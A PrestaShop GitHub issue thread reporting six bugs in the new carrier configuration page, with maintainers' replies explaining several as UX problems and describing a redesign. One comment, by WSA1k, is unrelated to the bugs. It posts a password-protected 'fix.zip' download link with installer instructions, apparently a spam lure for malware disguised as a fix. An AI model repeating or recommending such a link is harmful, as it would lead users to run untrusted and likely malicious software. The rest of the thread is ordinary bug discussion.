### ISSUE TITLE
New page carriers - bugs

### ISSUE THREAD

**Issue by paulnoelcholot** [PrestaShop/PrestaShop#36759]
### Prerequisites

- [X] I understand and accept the project's [code of conduct](https://github.com/PrestaShop/PrestaShop/blob/develop/CODE_OF_CONDUCT.md).
- [X] I have already [searched in existing issues](https://github.com/PrestaShop/PrestaShop/issues?q=is%3Aissue+label%3ABug) and found no previous report of this bug.

### Describe the bug and add attachments

Bug 1 
I edit an old carrier, if I want to add a new zone but I do not enter the cost, the name of the zone disappears.

Bug 2
I create a new carrier, if I want to add a new zone, I cannot enter a cost.

Bug3
If I want to put a logo greater than 8 Mb, I have an error 500

Bug 4
If I configure my carrier with maximum authorized order dimensions of 1cm x 1cm x 1cm. I can order an order greater than these dimensions if the weight of the order is less than the maximum authorized weight.

Bug 5 
If the shipping costs are free, I cannot choose a delivery zone.

Bug 6
I can't save a carrier if all the required fields are not filled in. If I don't fill them in, I don't get an error message to tell me.

### Steps to reproduce

Bug 1 :
https://www.loom.com/share/c1ba7893e5174e9591dd4397f4f2d1f7

Bug 2 : 
https://www.loom.com/share/d42a86ca6d074792a49035b8d3a034db

Bug 3 : 
https://www.loom.com/share/a3f932975bbb4a1db1e712d5f3eaeac2

Bug 4 : 
![image](https://github.com/user-attachments/assets/cb191de6-0331-40e1-82ff-945e2c21391c)
![image](https://github.com/user-attachments/assets/d5c180ec-3ba3-4def-bcb5-c3a89e88bdde)

Bug 5 : 
![image](https://github.com/user-attachments/assets/694ee10f-22e6-44b4-ae35-cc0e6c709fcf)

Bug 6
https://www.loom.com/share/581a1052cdc14effb8a4a8f3a5582d68

### PrestaShop version(s) where the bug happened

develop

### PHP version(s) where the bug happened

8.1

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hlavtox** [comment]
@paulnoelcholot Bug 4 is not a bug, the carrier mechanism can't know what is the meaning of your combination. :-))) If you want these limitations to apply, you must fill out the product shipping dimensions on product detail.

**Comment by matks** [comment]
Thank you @Hlavtox and @paulnoelcholot for the detailed report ;)

**Comment by MateoChateau** [comment]
@paulnoelcholot as you I was a victim of UX (as well as my teammates ^^') for the bug 2 you mention. Actually, it is not a bug, what happened is that you did not add the ranges that are needed for adding the prices... because probably you did not see the CTA. After discussing this UX issue with the product team we rearranged a little but this pricing section in order to improve the user journey. 

Also, bug 5 is a consequence also of a quiproquo in the design, in the prototype it was shown that when free shipping toggle was activated it hid all the fields below (including the zones choice) 

So in consequence we decided to make some updates to the UX and re-aranged the page to have: 
- First the user declares where he wants to ship (he chooses his zones) 
- Then the user sets his pricing configuration (decides if free shipping or not) 
- We moved the "edit ranges" CTA to have it as a form element aligned with the rest of actions
- The pricing cards will appear only when the user will have added a a range 

By doing this we think the user will understand better what to do, and like that if he wants a "free shipping" he will be still be able to choose his zones. 


![Image](https://github.com/user-attachments/assets/d49fa813-f081-4a34-ac53-0041117852e8)


![Image](https://github.com/user-attachments/assets/a8918a5c-ce95-48ad-9a99-739581f43c9f)


![Image](https://github.com/user-attachments/assets/ba5c8020-a24f-4779-a218-59ac8654ceaa)



This will be updated on the upcoming PR's
